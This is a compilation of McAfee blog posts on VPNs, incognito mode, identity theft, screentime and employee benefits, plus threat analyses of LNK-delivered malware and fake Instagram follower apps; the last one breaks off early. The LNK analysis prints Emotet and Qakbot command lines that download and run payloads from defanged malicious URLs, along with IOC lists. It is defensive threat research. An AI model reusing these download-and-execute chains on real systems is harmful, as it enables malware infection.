  • The number of servers: A good VPN should offer a selection of servers that can handle a lot of traffic without undermining connection speeds. 
  • Robust data encryption: Converting data into a code is what makes a good VPN tick. So, opt for a VPN with the latest encryption technology, such as AES 256-bit encryption offered by McAfee SafeConnect VPN. 
  • Server location: The VPN service should also offer servers located in various regions depending on your connection requirements. Nearby service can reduce lag, particularly when you want to engage in online gaming. And sometimes, you need a VPN server from another region or country to get around geo-blocking. 
  • Excellent tech support: The right VPN solution should come with good technical support to help you find answers to any questions you may have. 
  • Ease of use: A good VPN client should be easy to set up and use so you can focus on your online activities rather than tweaking the VPN settings. 

Can you use a VPN on mobile devices?

If you have a mobile device like an Apple iPhone or Android device, you can also enjoy the benefits that come with using a VPN.  

Setting up and using a VPN like McAfee’s Safe Connect VPN on an Android device or iOS platform is super easy. Just download the VPN from the app store or the McAfee website, and you’re good to go.  

McAfee offers both a free VPN (with 250 MB of free data every month and protection for one device) and paid subscription plans that come with unlimited data and protection for up to five devices. You can also enjoy a 30-day free trial to see if it’s the right VPN for you. 

It’s usually fine to just use the default settings, too, so you don’t have to do anything else other than login. 

Keep your browsing private

Hiding your IP address and maximizing privacy has never been easier thanks to virtual private networks. These tools can also protect you from prying eyes by converting the information you upload to the internet into code using advanced encryption technology.  

VPNs have several advantages, including getting around website trackers used by advertisers to monitor your online activities. Another thing to remember is that it’s relatively easy to set one up no matter your operating system 

If you’re looking for the right VPN solution for you, consider McAfee Secure VPN — included in McAfee Total Protection — which comes with the latest encryption technology. Whether you install the software on your mobile or desktop device, you can be confident that you and your family’s sensitive data is secure.  

The post How to Set Up a VPN appeared first on McAfee Blog.

Rise of LNK (Shortcut files) Malware

By McAfee Labs

Authored by Lakshya Mathur

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

Figure 1 – Apr to May month geolocation of the LNK attacks
Figure 1 – Apr to May month geolocation of the LNK attacks

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

Figure 2 _ LNK files as seen by a normal user
Figure 2 _ LNK files as seen by a normal user

LNK THREAT ANALYSIS & CAMPAIGNS

With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.

 

EMOTET

Infection-Chain

Figure 3 _Emotet delivered via LNK file Infection-Chain
Figure 3 _Emotet delivered via LNK file Infection-Chain

Threat Analysis

Figure 4 _ Email user received having malicious LNK attached
Figure 4 _ Email user received having malicious LNK attached

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

Figure 5 _Properties of Emotet LNK sample
Figure 5 _Properties of Emotet LNK sample

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Figure 6 _ Contents of Emotet LNK file
Figure 6 _ Contents of Emotet LNK file

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.

ICEDID

Infection-Chain

Figure 7 _ IcedID delivered via LNK file Infection-Chain
Figure 7 _ IcedID delivered via LNK file Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties

Figure 8 _ Properties of IcedID LNK sample
Figure 8 _ Properties of IcedID LNK sample

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcalle[.]com/listbul.exe

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.

QAKBOT

Infection-Chain

Figure 9 _ Qakbot delivered via LNK file Infection-Chain
Figure 9 _ Qakbot delivered via LNK file Infection-Chain

Threat Analysis

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.

Figure 10 _ Properties of Qakbot LNK sample
Figure 10 _ Properties of Qakbot LNK sample

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.

CONCLUSION

As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type SHA-256 Scanner  
Emotet LNK 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 WSS LNK/Emotet-FSE
IcedID LNK 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 WSS LNK/Agent-FTA

Suspicious ZIP!lnk

Qakbot LNK b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 WSS LNK/Agent-TSR

 

URLs (Uniform Resource Locator) hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/

hxxp://filmmogzivota[.]rs/SpryAssets/gDR/

hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/

hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/

hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/

hxxps://hectorcalle[.]com/093789.hta

hxxps://hectorcalle[.]com/listbul.exe

hxxps://green-a-thon[.]com/LosZkUvr/B.png

WebAdvisor All URLs Blocked

 

The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

What Is Incognito Mode and How Safe Is It?

By McAfee

The internet makes it easy to get a lot done, but not all of it needs to be public. That’s where incognito mode comes in, letting you hide your search history from others who are using your internet-connected device. For example, imagine searching online for “ideas for a surprise birthday party.” You wouldn’t want the guest of honor to see that if they use your shared computer!  

What most people don’t realize, though, is that incognito mode or private browsing isn’t really private. If you want to have a private browsing session, it helps to understand what incognito mode does and doesn’t do. 

In this article, we’ll explain what incognito mode is, how to turn it on using different search engines and mobile devices, and why a VPN like McAfee Secure VPN might be a better option for safeguarding your privacy. 

What is incognito mode?

When you search the internet, your web browser automatically saves the history of your searches. In incognito mode, however, it deletes this information when you end the session.  

Google Chrome coined “incognito mode,” so the term is pretty popular. Other web browsers might refer to it differently. For example, Firefox calls it “private mode,” while Safari uses the term “private browsing.”  

What does incognito mode hide?

When you search the internet in private browsing mode, your browser won’t save the history of the websites once you close all of the incognito tabs. This deleted information might include: 

  • Browsing history, which is a list of the websites you recently visited 
  • Cookies, which are small files websites use to remember you and your login information 
  • Site data, which is information entered on a website’s forms 

What browsing history data is visible with incognito mode?

Incognito mode can be super convenient but, as we said, it’s not really private. While it’s true that anyone using your device won’t be able to view your history, your browsing can still be viewed by outside eyes, like:  

  • Internet service providers (ISP): The company that provides your internet service knows every site you’ve visited. If they receive a subpoena from law enforcement, they’ll have to turn over that data. 
  • Websites: Even if you’re in incognito mode, your ISP shares your internet protocol (IP) address with the websites you visit. The IP address is a unique number that identifies an internet-enabled device. Anyone with your IP address can determine the city, or possibly the neighborhood, where you live. The only way to conceal your IP address when browsing is to use a virtual private network like McAfee Secure VPN. 
  • School or company networks: If you use a network run by your school or employer, they can see your browsing history even if you’re in incognito mode. 
  • Websites you log into: When you’re in incognito mode and log into a website like Twitter, you won’t be anonymous. The site can also share your data with other websites. 

How to turn on incognito mode

Every major browser and mobile device has a type of private browsing. Here’s how to access incognito mode in a few different ways. 

Private browsing in Google Chrome

It’s easy to launch a search in incognito mode in Google Chrome. Just follow these steps:  

  1. Open the Chrome browser on your device. 
  2. Click the three vertical dots in the upper-right corner of the window. 
  3. Select “New Incognito Window.”  
  4. Or use a keyboard shortcut: In Windows, Linux, or Chrome, press Ctrl + Shift + N. On a Mac, press ⌘ + Shift + N. 

You’ll know you’re in Chrome’s incognito mode by the black background and spy icon on the homepage. Here, Chrome reminds you of what incognito mode will and won’t do.  

There is also a toggle to block third-party cookies. When you visit different websites while in incognito mode, websites can track your movement. They might use that data to target ads based on your search history. When you enable third-party cookie blocking, it stops sites from sharing cookies and data. 

Private browsing on your Android device

Here’s how to set it up in the Google Chrome browser for your Android (note that the Google Chrome app is the default browser for most Android phones): 

  1. Open Chrome. 
  2. Tap the three dots at the top-right corner of the screen. 
  3. Tap “New incognito tab.” This will open up a new incognito window. 
  4. Close the incognito window to end the incognito session. 

Remember, for Google Chrome’s incognito mode to do the trick, you need to close your browsing session after each use. If you leave the tab open and someone else uses your phone, they can see your activity. 

Private browsing in Mozilla Firefox

What Chrome calls “incognito mode,” Mozilla Firefox refers to as “private browsing.” There are a couple of ways to launch a private window using the steps below: 

  1. Open Mozilla on your browser. 
  2. Click the three horizontal lines in the top-right corner. 
  3. Select “New Private Window.” 
  4. Or use the keyboard shortcut Ctrl + Shift + P in Windows. On a Mac, press Command + Shift + P. 

The private browsing window has a dark-purple background and a mask icon. This homepage also describes the limitations of private browsing. 

With its Enhanced Tracking Protection, Firefox blocks third-party tracking across sites. This is a default protection on Firefox, so cookies are blocked across sites no matter which privacy setting a user chooses. 

Private browsing in Apple Safari

Apple’s Safari was the first to introduce private browsing for Apple devices in 2005. Users have a couple of ways to open a private window on a Mac or an iOS device. They include: 

  1. Go to the File menu and select “New Private Window.” 
  2. The keyboard shortcut is to hold down Command + Shift + N. 
  3. On an iPhone, open Safari. Tap the “Tabs” button (the two squares on the lower right). Tap “Private.” Tap “Done.” 

Your sign that you’re in a private browser window is a dark gray search bar. Like Firefox, Safari lets you block third-party tracking (you’ll just need to adjust your settings to do so). Choose Safari on your Mac. Go to “Preferences” and click “Privacy.” Then, select “Prevent cross-site tracking.” 

Private browsing on your iPhone

For iPhones, the default browser is Safari. Here’s how to set up private browsing in Safari for your iPhone: 

  1. Open Safari. 
  2. Tap the tab icon at the bottom right of the screen (it looks like two overlapping squares). 
  3. Tap “private” at the bottom-left of the screen. 
  4. To exit private mode, tap “private” again. 

Remember to close your browser’s private tabs when you’re done surfing. This makes sure that cookies are deleted and the private session is safely hidden from your device’s history. 

Why do people use incognito mode?

Doing a private search that erases your browsing history can be useful in certain situations. Because some cookies are deleted at the end of your search, you’ll see fewer ads than in a normal search.  

If there’s something you don’t want to keep in your browser history, like shopping for a gift for a relative, an incognito search can keep your activity private.  

It’s also a good idea to use incognito mode when using a public device or a borrowed computer to protect your data.  

Incognito mode is even helpful if you want to do a search that’s not influenced by your browsing history or to see your blog or website from a fresh perspective. 

Is incognito mode safe?

The terms “private search” and “incognito mode” sound great. But while your history is erased on your device, it’s still visible to the outside world. Even when you’re in incognito mode, websites, your ISP, and your network can still see your IP address and browsing history. 

Not to mention, it won’t delete any files you download, like malicious software. While someone using your device won’t be able to see your browsing history, incognito mode won’t be able to stop hackers and identity thieves in their tracks. 

If you really want to hide your computer’s IP address and browse privately while keeping your data safe, it’s a good idea to look into a VPN service, like McAfee Secure VPN. With our smart VPN, you can browse confidently and stay anonymous from advertisers and prying eyes. You’ll also benefit from bank-grade encryption and automatic protection on unsecured networks.  

Browse online confidently

If your goal is to keep prying eyes out of your browsing history, incognito browsing might not be enough. Use a McAfee Secure VPN for worry-free browsing.  

For added security, though, upgrade to McAfee Total Protection Ultimate and enjoy antivirus protection, identity monitoring, and more! 

The post What Is Incognito Mode and How Safe Is It? appeared first on McAfee Blog.

What Is Identity Theft and How Do You Recover From It?

By McAfee

The internet is a big place. While it’s changed the world for the better — making our daily lives that much easier! — it can also be a playground for cybercriminals who would love to get their hands on our personal information.  

When this happens, it can result in identity theft. While it can be scary to deal with, there are things you can do to protect yourself and recover from this type of cybercrime.  

In this article, we’ll tell you what identity theft is and how to recognize its various forms. We’ll also go over what you can do to bounce back after your identity has been taken.  

What is identity theft?

Life online presents so many cool opportunities, but it can also make us vulnerable to cybercriminals. But that doesn’t mean you need to get offline. A little knowledge can go a long way in keeping you safe. It all starts with understanding what identity theft is.  

Identity theft is when someone steals your personal or financial information to commit fraud or deception, typically for monetary gain. Depending on their goals, they might take a variety of information. Unfortunately, this is something most people will experience — either directly or indirectly — at some point in their lives. 

What makes identity theft really troublesome is that the consequences can go beyond just affecting your credit score. You might experience issues while trying to get jobs, see an increase in your auto insurance rate, get a surprise tax bill, and even find out you have a criminal record! Not to mention it can cost a lot of time and money to fix.  

Just as important as it is to understand what identity theft is, it’s also important to know the different types of identity theft so you can keep an eye out.  

Types of identity theft 

You work, play, and shop on the internet every day, but you shouldn’t let the fear of identity theft stop you from doing what you enjoy online. All it takes is a little information to outsmart online criminals — including knowing the different types of identity theft. They include: 

  • Financial identity theft: A thief will use your identity for their own financial gain. The cybercriminal might hack your bank account to steal funds or use your credit card for online shopping. If you have a good credit history, they might even use your identity to buy a home or rent an apartment.  
  • Medical identity theft: A thief will use your identity to secure medical services. With your health insurance information, they can get prescription drugs, buy medical equipment, or even pay for medical care and procedures. Whatever your insurance doesn’t pay for will then get billed to you.  
  • Criminal identity theft: This happens when a thief is busted for a crime and gives the arresting officer your information. The criminal might have stolen your actual ID or created a fake one, and you won’t know what’s happened until the crime shows up on your background check (or, worse, you get a court summons in the mail).  
  • Synthetic identity theft: A thief will use your identity to create a fake person. The new persona will have your birthdate, Social Security number, and address — but a different name. They can then use this persona to do things like apply for loans and get credit cards 
  • Child identity theft: A thief will use a child’s identity to commit fraud. Kids usually don’t have bank accounts or debt. The thief may use the child’s identity to do things like buy homes or get social benefits.  

How does identity theft happen?

How does an identity thief get your information? Any time you make a purchase, subscribe to a website, file a tax return, or do anything else online, you share your personal information. And some cybercriminals are pretty good at getting that information for themselves.  

Here are a few of the most common ways thieves can get access to your data 

  • Phishing scams: A thief might message you over email or social media pretending to be someone they’re not. They may claim to be calling on behalf of the Internal Revenue Service (IRS), a sweepstakes, or even a family member. After that, the criminal will ask for money or your personal information.  
  • Data breach: When you fill out webforms, open new accounts, or make purchases online, your personal information is likely saved in a company database. Most companies do their best to keep your information secure, but hackers are always hard at work trying to gain access to it. If the hackers can breach your information, they can sell it for a profit.  
  • Internet of Things (IoT): It’s not just computers that have internet access anymore. Hackers might also try to steal personal information from your smartphone, tablet, or another internet-compatible device. 
  • Social media: People share all kinds of personal information on social media. In addition to data like your birthday, address, and phone number, criminals can learn about your family members, pets, and interests. They can use this data as potential password information when they try to break into your online accounts. 
  • Physical theft: Some thieves are old-fashioned. A criminal can take your credit card, ID, smartphone, or computer and use it to steal your identity. If you throw away documents like paystubs or checks without shredding them first, criminals can use them to get your personal data, like your bank account numbers. 

What personal information is generally taken when identity theft occurs?

The type of information that hackers take during a breach can vary widely. It just depends on what information a company stores, what data the cybercriminal can access, and even the purpose of the attack. A hacker might be making a political statement or simply “showing off” their skills. 

During a breach, hackers target information that can be resold on the dark web or used for identity fraud, like debit card or credit card accounts. They might also collect data like people’s full names, email addresses, passwords, Social Security numbers, and driver’s license numbers. 

How to recover from identity theft

Dealing with identity theft can be stressful and a little bit scary, but we promise it’s not the end of the world. The important thing is to be quick about it and stay alert for signs of identity theft, like:  

  • A sudden dip in your credit score  
  • Mail addressed to your home with someone else’s name on it 
  • Calls from debt collectors about debts that aren’t yours 
  • Unexplained bills showing up at your home  

The good news is that if you’re ever the victim of identity theft, there are several things you can do to limit and reverse that damage. We’ll explore these steps in the next few sections. 

Contact the company where your information was stolen

Notify your credit card company, financial institution, or the business where the thief is using your data right away. For example, if the criminal is using your credit card number to buy clothing online, contact the store immediately. They’ll be able to stop any further purchases from being made.  

File a police report

Banks don’t like scams, either. Some banks may require you to show them a police report about your identity theft before they’ll refund any fraudulent charges or withdrawals. Call your local law enforcement office to report identity theft as soon as you can.  

Before speaking to an officer, though, take the time to go over all the information so you don’t leave anything out. Be as detailed as possible. Let the cops know how your sensitive information was used and what dates and times it was used. You may want to bring a copy of your bank statement as proof. 

Notify the three major credit bureaus 

One of the biggest pains about identity theft is that it can affect your credit score, which can affect your ability to do things like secure a business loan or buy a house. File a fraud alert with each of the three major credit bureausTransUnion, Equifax, and Experian — and let them know which activity on your credit report is false.  

File a report with the Federal Trade Commission

When you file a report with the Federal Trade Commission (FTC), they’ll create a free recovery plan for you to deal with your identity being stolen. The FTC is a government organization that protects the rights of consumers. You can get started by visiting IdentityTheft.gov 

Consider investing in a comprehensive security plan

The best time to deal with identity theft is before it happens. When you sign up for all-in-one protection, like McAfee Total Protection, you’ll get $1 million of identity theft protection insurance.  

We’ll also provide identity monitoring to help catch threats to your information before they get out of hand. You’ll also get access to our Secure VPN and our quality antivirus and safe browsing software to protect you from threats like malware 

Browse confidently with award-winning identity protection 

You deserve to live your life online and enjoy the internet the way it was meant to be. That’s where McAfee can help — making the digital world a safe place for you and your family! 

We’ve got your back when it comes to your online identity with our identity protection service. When you sign up, we’ll keep tabs on up to 60 unique types of personal data, including your financial information. We’ll also notify you up to 10 months sooner than similar services if it seems like your identity has been compromised. And on top of $1 million of ID theft coverage, you’ll receive hands-on restoration support to get your identity back.  

See how McAfee can help secure your personal information online and give you peace of mind.  What Is Identity Theft and How Do You Recover From It?

The post What Is Identity Theft and How Do You Recover From It? appeared first on McAfee Blog.

6 Tips to Help Your Balance Your Children’s Summer Screentime

By Toni Birdsong

The pandemic forced many parents into screentime management Bootcamp. We learned quickly that more hours at home require more intention in managing family technology. The exact purpose holds true for summer. Before things get too crazy—vacations, camps, and a revolving door of friends—a priority might be putting a screentime plan in place.  

Add to the summer equation that many parents are still on remote or hybrid work schedules, and the need for a summer screentime plan becomes even more important.

But first, what’s the cost of just winging it with screentime this summer? Doing so could harm your child both emotionally and physically. According to the American Academy of Pediatrics (AAP), children spend an average of seven hours a day on entertainment media, such as televisions, computers, phones, and other electronic devices. Now that summer is here, we can assume that number will increase.

Balancing your child’s screentime is also a safety issue. As the summer ticks on, boredom can lead to more time online, which can open the door to threats such as cyberbullying, self-esteem and body issues, risky behavior, and connecting with strangers.

Keep in mind that every family’s summer screentime balance plan will be different depending on family schedules and children’s ages. Not sure where to begin? The AAP has an excellent, customizable Media Plan that includes a Screen Time Calculator. The guide will help you design a plan based on the ages of each child in your family.  

6 Tips to Help You Balance Screentime

  1. Inventory Activities and Discuss Limits. Bring the whole family into the screen time discussion. What does an average day look like in your home? What activities can each person dream up outside of television, gaming, or social media? Where are the daily windows where consistent family time can happen? What kind of limits would be ideal? Discuss ways to keep one another accountable and a fun way to track success and consequences.  
  2. Have plenty of non-screen activities ready.  One way to keep kids off their screens, is  offering them interesting options that outrank what’s happening on their devices. Consider, as a family, creating a list of at-home and on-the-go activities. Consider a trip to the lake, the beach, or a local museum. You might learn a new craft or pick a home project to complete (a bedroom makeover) together. Maybe try your hand at making pasta from scratch or growing your own vegetables. Activities don’t have to be pricey; often, simple is better. Whatever your list contains, remember: An idea is a dream without a real plan and taking real time to make it happen. 
  3. Know where they go, what they see. As you know, at McAfee, we are front-line advocates of family filtering software. The content your kids consume this summer matters. Understanding the social networks and apps your kids frequent is key to keeping them safe this summer. The time and effort you spend establishing screen limits don’t matter much if the content your child views isn’t age-appropriate. A few questions to help assess content: 
    1. Is the content age-appropriate? Are the apps my child uses interactive and learning-based or mind-numbing, or even risky? 
    2. Do my family’s technology habits require filtering software to help block inappropriate websites? 
    3. Are the privacy settings on social media and gaming accounts set to restrict what strangers can see and who can send a direct message to my child?
  4. Maintain a device curfew. Just because it’s summer, doesn’t mean anything goes. Consider keeping many of the same device rules in place. A device curfew in the summer months is more critical since kids like to take their devices to bed and scroll or text into the wee hours.    
  5. Make sure they know why. This is a step some parents unintentionally may skip. Even if you find yourself repeating the ‘why’ of screen limits to your kids, make sure they understand you aren’t being random with the rules. Let them know that it’s a proven reality (studies show) that excessive screentime has an array of emotional and physical consequences that you aren’t willing to allow into your family. 
  6. Step into their world.  Have you ever thought of picking up that game controller and playing your child’s favorite game with them? It’s a simple gesture that could build amazing bridges. Not only could it help you understand their digital routines and communities, but it would also open the door for consistent online safety discussions. If your child spends most of their time on TikTok or Snapchat, ask them to show you around the apps. Be teachable and open to their favorite online activities. (One of my personal mottos is that as a parent I must make every effort to be teachable if I expect my kids to be reachable)!

One mom on Facebook recently shared a powerful reminder that, as parents, we only have 18 summers with our kids before—poof—they are grown. She also shared an inspiring visual reminder. She keeps a clear jar with each of her children’s names on it in plain view. Inside each jar, she places 18 colorful tiny pom-poms. She subtracts one pom pom each year on their birthday. As the pom poms visually decrease, it reminds her to make the most of her time with each child. Here’s hoping your summer is packed with less screentime and more moments that make each pom pom count. 

The post 6 Tips to Help Your Balance Your Children’s Summer Screentime appeared first on McAfee Blog.

McAfee’s Digital Wellness Delivers Online Protection As An Employee Benefit

By Rachel Berry

The topic most top of mind today for HR professionals is keeping and acquiring great talent.  One of the most important elements of doing both is providing a desirable and meaningful set of employee benefits.   

Digital Wellness is a New Pillar in the Employee Benefits Space 

The idea of Digital Wellness isn’t exactly brand new, but the world we’ve lived in for the past few years has cemented it into one of the main pillars of employee benefits, joining the traditional big three of Financial, Mental and Physical Wellness.   

Employees Are Spending the Majority of Their Time Online 

One of the main reasons Digital Wellness has become essential is that so many people have had to both live and work exclusively online for an extended period of time – spending 8+ hours a day on personal things in addition to all those hours they spend working via the web. Things like banking, telehealth and shopping to name a few.  

  • 84% claim internet banking is the most important channel while interacting with their bank1
  • 75% have used telehealth services in the past 12 months2
  • 49% of consumers are buying online more3  and 41% of those are shopping daily or weekly via mobile or smartphone4

There’s almost no aspect of life that isn’t touched by the internet for most people, especially when adding their work environment into the mix.  

Remote Work Isn’t Going Away

In addition to all the regular life they live online, employees have become accustomed to working remotely, even if it’s just part of the time. 

  • 36.2 million workers are predicted to be working remotely by 2025 – an 87% increase from pre-pandemic levels5 
  • 59% of respondents in a study by Owl Labs said they would be more likely to choose an employer who offered remote work5
  • 32% said they would quit their job if they were not able to continue working remotely5 

With these kinds of stats, it’s hardly surprising that 74% of employers plan to maintain some sort of remote/hybrid workforce into the foreseeable future6   

Cybercriminals are Taking Full Advantage of All the Extra Traffic  

The digital world has become a veritable smorgasbord for hungry cyber criminals. In fact, there’s been a 400% increase in cybercrime just over the last couple of years7. To put it in perspective, here are a few sobering statistics that happen on a daily basis:  

  • 3 billion phishing emails are sent by scammers8 
  • 24,000 malicious mobile apps are blocked on average9
  • 6.85 million accounts are hacked10

Unfortunately, all this means that people are in a constant battle to protect themselves from cyber risk.  

When Employees are at Risk, Their Employers are at Risk 

With everyone going about their daily activities and working whenever and wherever they happen to be at the time, it’s probably no surprise that more than half of employees are using their personal devices for work11.  It’s just too convenient not to.  However, when you also realize that 95% of breaches are caused by human error12, this intersection between personal life and work-life becomes risky for both the employees and their employers.  It’s no wonder that companies with a large number of employees working remotely have seen a 24% increase in breaches since the pandemic began13. 

Cyber Risk has Placed Huge Financial Strains on Companies 

When companies’ networks are breached it causes their customers to be vulnerable, risking a huge blow to their reputation and invoking serious fines and penalties due to compliance failures.  And trying to get cyber insurance to protect against financial loss has become increasingly more difficult.  A recent article by the Wall Street Journal reported that cyber insurance premiums rose 92% in 2021 and the hoops companies have to jump through are much more stringent to be eligible for the coverage – things like providing cyber education and ensuring they’re taking stronger steps to protect their network and customer data14 

In addition to the direct financial impact of cyber threats, there’s also the loss of human capital.  It can take up to six months and up to 200 hours of a person’s time to address and correct identity theft15. If employees are focusing on digital healing, it’s a fair bet they’re not focusing as closely on their work. 

To Achieve Digital Wellness, Employees – and Their Employers, Need Two Things 

Preventative care is the first step toward Digital Wellness, and it consists of three, simple parts. 

  1. Knowledge is power as they say, so cyber education is key.  For example, if an employee can identify those 3 billion phishing emails sent daily, they are much less likely to be wooed into clicking on dangerous links, and if they understand how important it is to create strong and unique passwords, they can help protect themselves even if they’re found in a data breach. 
  2. Ward off threats by installing device protection to safeguard people’s access points to the internet. This means protecting all devices (PCs, Macs, smartphones, tablets, and smart home devices) against digital dangers like viruses/malware, unsecured network connections (thanks but no thanks, random coffeeshop Wi-Fi!), and spoofed/unsafe websites.  
  3. Take back control of employees’ privacy and data. How? It can be done by doing things like installing a virtual private network (VPN) that encrypts unsecured Wi-Fi networks to make them safe from prying eyes, proactively monitoring the dark web for identity breaches and by identifying and cleaning up all the unneeded profiles that have been piling up over the years. 

Restorative care is the second step in the Digital Wellness journey.  If a digital threat sneaks through even after all the careful preventive care, it’s important to quickly remedy the situation. 

  1. Kick uninvited cyber criminals out as soon as they’ve been discovered by removing viruses, malware, ransomware, etc. from each infected device as rapidly as possible.  
  2. Identity stolen? Do a credit freeze then work on restoring your reputation by combating things like fraudulent unemployment claims, unauthorized lines of credit and unlawful home title transfers. 
  3. Leverage financial restoration options to fix your damaged credit score and make your pocketbook whole again through cyber breach insurance. 

It’s Never Been More Important to Offer a Digital Wellness Solution as an Employee Benefit 

Great benefits that have real meaning for employees are key to helping retain and acquire amazing talent.  Providing an all-in-one and easy-to-use Digital Wellness solution designed to safeguard against compromised devices, privacy leaks, identity theft and other frustrating, time-consuming issues not only provides peace of mind for employees but also directly – and positively, impacts a company’s bottom line.  Choosing a trusted cyber protection solution like McAfee for your Digital Wellness benefit will give your employees a brand they love and your company the advantage of 30+ years of experience protecting people from digital threats.   

For more information on McAfee Digital Wellness, visit www.mcafee.com/employee-benefits-info or send an email to EmployeeBenefits@McAfee.com.  

Footnotes –  

  1. Capgemini and Efma, World Retail Banking Report 2021 
  2. 2021 McAfee Consumer Research Emerging Tech Trends Survey, December 2021 
  3. McAfee’s 2020 Holiday Season: State of Today’s Digital e-Shopper survey 
  4. PWC December 2021 Global Consumer Insights Pulse Survey 
  5. Statistics on Remote Workers that Will Surprise You – May 11, 2022
  6. Gartner CFO Survey 2020 
  7. The Hill. “FBI seeks spike in cybercrime reports during coronavirus pandemic.” April 2020 
  8. Zdnet.com – “Three billion phishing emails are sent every day. But one change could make life much harder for scammers” March 2021
  9. TechJury- “How Many Cyber Attacks Happen Per Day in 2022?” May 2022 
  10. 4. WCNC Charlotte – “How strong is your password? A professional hacker says probably not strong enough” June 2021 
  11. IBM – Work from Home Study, 2020 
  12. The Wall Street Journal. “Human Error Often the Culprit in Cloud Data Breaches.” August 2019 
  13. Gartner. “Designing Security for Remote-Work First Enterprises” 
  14. Wall Street Journal “Cyber Daily: Cyber Insurance Became Much Pricier in 2021” May 2022 
  15. The Economist – “How to protect yourself against the theft of your identity

The post McAfee’s Digital Wellness Delivers Online Protection As An Employee Benefit appeared first on McAfee Blog.

Instagram credentials Stealers: Free Followers or Free Likes

By McAfee Labs

Authored by Dexter Shin 

Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users are looking to increase their follower numbers, as this has become a symbol of a person’s popularity.  Instagram’s large user base has not gone unnoticed to cybercriminals. McAfee’s Mobile Research Team recently found new Android malware disguised in an app to increase Instagram followers. 

How can you increase your followers or likes? 

You can easily find apps on the internet that increase the number of Instagram followers. Some of these apps require both a user account and a password. Other types of apps only need the user to input their user account. But are these apps safe to use? 

Figure 1. Suspicious apps in Google Images 
Figure 1. Suspicious apps in Google Images

Many YouTubers explain how to use these apps with tutorial videos. They log into the app with their own account and show that the number of followers is increasing. Among the many videos, the domain that appears repeatedly was identified. 

The way the domain introduces is very simple. 

  1. Log in with user account and password. 
  2. Check credentials via Instagram API. 
  3. After logging in, the user can enjoy many features provided by the app. (free followers, free likes, unlimited comments, etc.) 
  4. In the case of free followers, the user needs to input how many followers they want to gain.  
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.

When you run the function, you can see that the number of followers increases every few seconds. 

Figure 3. New follower notifications appear in the feed.
Figure 3. New follower notifications appear in the feed.

How does this malware spread? 

Some Telegram channels are promoting YouTube videos with domain links to the malware. 

Figure 4. Message being promoted on Telegram
Figure 4. Message being promoted on Telegram

We have also observed a video from a famous YouTuber with over 190,000 subscribers promoting a malicious app. However, in the video, we found some concerning comments with people complaining that their credentials were being stolen. 

Figure 5. Many people complain that their Instagram accounts are being compromised

Behavior Analysis in Malware 

